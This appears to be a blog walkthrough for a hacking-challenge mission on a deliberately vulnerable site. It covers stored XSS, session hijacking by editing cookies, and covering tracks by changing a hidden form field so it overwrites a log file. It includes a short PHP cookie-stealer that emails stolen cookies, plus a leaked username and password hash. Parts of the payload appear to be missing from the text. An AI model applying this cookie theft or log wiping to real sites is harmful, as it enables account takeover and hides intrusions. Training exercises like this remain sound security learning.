Xss (Cross-Site Scripting) And Http Header Tampering

Click on “Private Message” from the menu and fill the form as follows, using following XSS as body:


And give a subject “cookie.php” and send the mail to “m-crap (owner)”. This means that cookie.php needs to take the cookie and send it to you. Here is the php code:

$cookie = $_GET[“cookie”];
mail(“admin@niser11.in”, “Cookie stealer report”, $cookie);





This code will send m-crap’s cookie information to your e-mail address. Note that the mission does not require this php page however it is useful to understand the complete process.

In the message you should receive the following. To simplify the attack, the site is directly providing us with the stollen information:

  • strUsername=m-crap@crappysoft.com
  • strPassword=94a35a3b7befff5eb2a8415af04aa16c
  • intID=1

Use Firecookie in Firefox or Inspect Element in Google Chrome to change the values as follows:









When you paste the content of the username, take care to transform “%40” in “@”.

Click on Pay salaries and then on the Pay button. You’re done with this stage

Cover your tracks

The mission is not over though. r-conner thanks you but tells you to remove your activity by using the subscribe to mailing list page. Click on “Mailing list” link and edit source code. Notice that there is a hidden field named strFilename with value ./files/mailinglist/addresses.txt. If you look at this file, you will get the list of email addresses:

2 3

In addition, the mailing list form says that it deletes all references that do not contain “@”, perfect to clear the log file. Also notice that directory listening is activated on files/ directory. We can find our log file:

Just replace the value in the hidden field

<input type=’hidden’ name=’strFilename’ value=’./files/mailinglist/addresses.txt’>

with this:

<input type=’hidden’ name=’strFilename’ value=’./files/logs/logs.txt’>

This will put the e-mail address you just typed into the logs.txt file. Submit the form and you’re done!

About the Author

Aloha, I'm Amit Ghosh, a web entrepreneur and avid blogger. Bitten by entrepreneurial bug, I got kicked out from college and ended up being millionaire and running a digital media company named Aeron7 headquartered at Lithuania.

Related Posts

Basic Mission 3   Have a look at the source code of that page and have you noticed the form section?...

Basic Mission 1   I can call you a pretty dumb as per you are now viewing the walkthrough for...

Basic Mission 2   I can again call you a pretty dumb as per you are now again viewing the walk...

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.